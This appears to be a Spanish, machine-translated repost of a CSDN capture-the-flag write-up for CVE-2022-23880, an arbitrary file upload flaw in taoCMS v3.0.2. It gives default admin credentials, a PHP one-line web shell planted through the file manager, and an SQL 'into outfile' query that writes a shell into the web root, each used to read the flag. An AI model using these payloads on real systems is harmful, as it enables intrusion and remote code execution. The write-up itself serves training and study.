Spring Cloud Environment: CVE-2022-23880 (vulnerabilidad de carga de archivos arbitrarios taoCMS v3.0.2)

Others 2023-07-25 17:21:32 views: null

Tabla de contenido

1. Tema

2. Introduzca el tema:

 2.1 El archivo escribe un caballo de Troya con una oración:

2.2 Escriba un caballo de Troya con una instrucción SQL:

1. Tema

Introducción de destino:

Existe una vulnerabilidad de carga de archivos arbitrarios en la administración de archivos taoCMS v3.0.2, los atacantes pueden ejecutar código arbitrario

2. Introduzca el tema:

visitar /administrar 

administrador: tao

 Página de gestión de fondo:

crear un nuevo archivo

 2.1 El archivo escribe un caballo de Troya con una oración:

<?php system($_GET[1]);phpinfo();?>

 Visite /shell.php?1=cat /flag

bandera{567b48ba-ed69-4f38-a75f-1102ecd2c8e0} 

<?php system('cat /flag');?>

 bandera{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}

2.2 Escriba un caballo de Troya con una instrucción SQL:

 Puede visitar:

 Escriba una palabra caballo de Troya en el archivo:

select "<?php system('cat /flag');?>" into outfile '/var/www/html/cat.php'

 Visita /cat.php

 bandera{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}

Supongo que te gusta

Origin blog.csdn.net/m0_65712192/article/details/131881952
Recomendado
Clasificación
Diario
Más
2024-05-01(4)
2024-04-30(33)
2024-04-29(5)
2024-04-28(9)
2024-04-27(28)
2024-04-26(22)
2024-04-25(34)
2024-04-24(31)
2024-04-23(29)
2024-04-22(5)

Code World

© 2018 codetd.com